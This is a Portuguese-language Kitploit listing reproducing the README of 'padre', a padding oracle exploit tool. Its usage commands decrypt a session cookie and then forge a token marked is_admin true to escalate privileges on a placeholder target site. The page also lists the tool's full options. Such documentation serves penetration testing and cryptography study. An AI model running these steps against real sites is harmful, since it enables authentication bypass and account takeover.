Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
padre — Exploit de Padding Oracle avançado e extremamente rápido. | Kitploit
Ferramentas/GitHubGitHub/glebarez/padre
ExploraçãoSegurança WebCriptografiaTestes de Penetração
GitHubglebarez/padre

padre

Exploit de Padding Oracle avançado e extremamente rápido.

Ver Repositório
28028há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Publish release

padre

padre é um explorador avançado para ataques de Padding Oracle contra criptografia no modo CBC

Recursos:

  • implementação extremamente rápida e concorrente
  • descriptografia de tokens
  • criptografia de dados arbitrários
  • impressão digital automática de padding oracles
  • detecção automática do tamanho do bloco de cifra
  • DICAS! se ocorrer falha durante as operações, padre dará dicas sobre o que pode ser ajustado para ter sucesso
  • suporta tokens em parâmetros GET/POST, Cookies
  • especificação flexível de regras de codificação (base64, hex, etc.)

Demo

demo

Instalação/Atualização

  • A maneira mais rápida é baixar o binário pré-compilado para seu SO a partir do Último lançamento

  • Alternativamente, se você tiver Go instalado, compile a partir do código fonte:

root@kitploit:~
go install github.com/glebarez/padre@latest

Cenário de uso

Se você encontrar um possível padding oracle, onde os dados criptografados estão armazenados em um cookie chamado SESS, você pode usar o seguinte:

root@kitploit:~
padre -u 'https://target.site/profile.php' -cookie 'SESS=$' 'Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg=='

padre fará automaticamente a impressão digital das respostas HTTP para determinar se o padding oracle pode ser confirmado. Se o servidor estiver de fato vulnerável, o token fornecido será descriptografado em algo como:

root@kitploit:~
 {"user_id": 456, "is_admin": false}

Parece que você poderia elevar seus privilégios aqui!

Você pode tentar fazer isso gerando primeiro seus próprios dados criptografados que o oracle descriptografará de volta para algum texto simples sorrateiro:

root@kitploit:~
padre -u 'https://target.site/profile.php' -cookie 'SESS=$' -enc '{"user_id": 456, "is_admin": true}'

Isso gerará outro conjunto codificado de dados criptografados, talvez algo como abaixo (se usado base64):

root@kitploit:~
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

Agora você pode abrir seu navegador e definir o valor do cookie SESS para o valor acima. Ao carregar a página original do oracle, você agora deve ver que foi elevado ao nível de administrador.

Impacto dos Padding Oracles

  • divulgar informações de sessão criptografadas
  • contornar autenticação
  • fornecer tokens falsos que o servidor confiará
  • geralmente, ampla extensão da superfície de ataque

Opções completas de uso

root@kitploit:~
Usage: padre [OPTIONS] [INPUT]

INPUT: 
	In decrypt mode: encrypted data
	In encrypt mode: the plaintext to be encrypted
	If not passed, will read from STDIN

	NOTE: binary data is always encoded in HTTP. Tweak encoding rules if needed (see options: -e, -r)

OPTIONS:

-u *required*
	target URL, use $ character to define token placeholder (if present in URL)

-enc
	Encrypt mode

-err
	Regex pattern, HTTP response bodies will be matched against this to detect padding oracle. Omit to perform automatic fingerprinting

-e
	Encoding to apply to binary data. Supported values:
		b64 (standard base64) *default*
		lhex (lowercase hex)

-r
	Additional replacements to apply after encoding binary data. Use odd-length strings, consiting of pairs of characters <OLD><NEW>.
	Example:
		If server uses base64, but replaces '/' with '!', '+' with '-', '=' with '~', then use -r "/!+-=~"

-cookie
	Cookie value to be set in HTTP requests. Use $ character to mark token placeholder.

-post
	String data to perform POST requests. Use $ character to mark token placeholder. 

-ct
	Content-Type for POST requests. If not specified, Content-Type will be determined automatically.
	
-b
	Block length used in cipher (use 16 for AES). Omit to perform automatic detection. Supported values:
		8
		16 *default*
		32

-p
	Number of parallel HTTP connections established to target server [1-256]
		30 *default*
		
-proxy
	HTTP proxy. e.g. use -proxy "http://localhost:8080" for Burp or ZAP

Leitura adicional

  • https://blog.skullsecurity.org/2013/a-padding-oracle-example
  • https://blog.skullsecurity.org/2016/going-the-other-way-with-padding-oracles-encrypting-arbitrary-data

Ferramentas alternativas

  • https://github.com/liamg/pax
  • https://github.com/AonCyberLabs/PadBuster
Baixar ferramenta